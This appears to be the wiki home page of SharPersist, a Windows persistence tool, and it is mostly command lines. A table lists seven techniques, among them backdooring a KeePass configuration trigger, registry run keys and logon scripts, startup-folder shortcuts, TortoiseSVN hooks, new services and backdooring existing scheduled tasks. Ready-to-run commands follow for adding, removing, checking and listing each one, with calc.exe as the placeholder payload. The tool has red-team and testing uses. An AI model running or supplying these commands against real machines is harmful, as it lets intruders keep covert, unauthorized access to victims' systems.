-
Notifications
You must be signed in to change notification settings - Fork 249
Home
Welcome to the wiki home page for SharPersist! For detailed information on each technique, you can navigate to the appropriate technique on the right-hand side. This will include usage information and detailed information on how each persistence technique works.
Technique | Description | Technique Switch Name (-t) | Admin Privileges Required? | Touches Registry? | Adds/Modifies/Removes Files on Disk? |
---|---|---|---|---|---|
KeePass | Backdoored KeePass configuration file with malicious trigger | keepass | No | No | Yes |
New Scheduled Task | New scheduled task that runs specified command | schtask | No | No | Yes |
Registry | Registry modification | reg | No | Yes | No |
Startup Folder | LNK file in user startup folder | startupfolder | No | No | Yes |
Tortoise SVN Hook Script | Tortoise SVN hook script to execute command when user connects to SVN repo | tortoisesvn | No | Yes | No |
New Service | New service that runs specified application | service | Yes | Yes | No |
Scheduled Task Backdoor | Adds additional action to an existing scheduled task | schtaskbackdoor | Yes | No | Yes |
KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
Tortoise SVN
SharPersist -t tortoisesvn -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -m add
Windows Service
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
Scheduled Task
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task -m add -o hourly
KeePass
SharPersist -t keepass -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m remove
Registry
SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove
SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove -o env
SharPersist -t reg -k "logonscript" -m remove
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -n "Something Cool" -m remove
Startup Folder
SharPersist -t startupfolder -f "Some File" -m remove
Tortoise SVN
SharPersist -t tortoisesvn -m remove
Windows Service
SharPersist -t service -n "Some Service" -m remove
Scheduled Task
SharPersist -t schtask -n "Some Task" -m remove
KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m check
Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check -o env
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m check
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m check
Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m check
Tortoise SVN
SharPersist -t tortoisesvn -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -m check
Windows Service
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m check
Scheduled Task
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m check
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m check -o hourly
Registry
SharPersist -t reg -k "hkcurun" -m list
Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -m list
SharPersist -t schtaskbackdoor -m list -n "Some Task"
SharPersist -t schtaskbackdoor -m list -o logon
Startup Folder
SharPersist -t startupfolder -m list
Windows Service
SharPersist -t service -m list
SharPersist -t service -m list -n "Some Service"
Scheduled Task
SharPersist -t schtask -m list
SharPersist -t schtask -m list -n "Some Task"
SharPersist -t schtask -m list -o logon